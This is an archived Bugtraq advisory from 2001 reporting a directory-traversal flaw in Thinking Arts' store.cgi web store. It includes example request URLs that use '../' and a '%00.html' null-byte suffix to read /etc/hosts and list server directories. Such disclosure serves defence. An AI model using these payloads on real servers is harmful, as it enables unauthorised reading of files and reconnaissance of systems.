Bugtraq mailing list archives
Thinking Arts Store.cgi Directory Traversal
From: slipy () B10Z NET
Date: Fri, 16 Feb 2001 07:14:01 -0000
Introduction: Thinking Arts LTD E-Commerce package comes with a webstore frontend called store.cgi which allows people to basically order products on their website over a SQL database. The vendors website is: http://www.thinkingarts.com/ Problem: Simple Directory Traversal Adding the string "/../" to an URL allows an attacker to view any file on the server, and also list directories within the server which the owner of the vulnerable httpd has permissions to access. Remote execution of commands does not apear to be possible with this directory traversal bug, but directory listings are. Please note that you do need the %00.html at the end of your command. Examples: http://www.VULNERABLE.com/cgi-bin/store.cgi? StartID=../etc/hosts%00.html ^^ = Will obviously open the hosts file. http://www.VULNERABLE.com/cgi-bin/store.cgi? StartID=../etc/%00.html ^^ = Will obviously list the /etc/ directory. Solution: Vendor has been contacted. No reply from them yet, and seeing only 3 sites who signed up for their dumb service are affected, so it doesn't really matter now does it? -------------------- b10z cgi advisory. slipy () b10z net February 16th, 2001.
Current thread:
- Thinking Arts Store.cgi Directory Traversal slipy (Feb 16)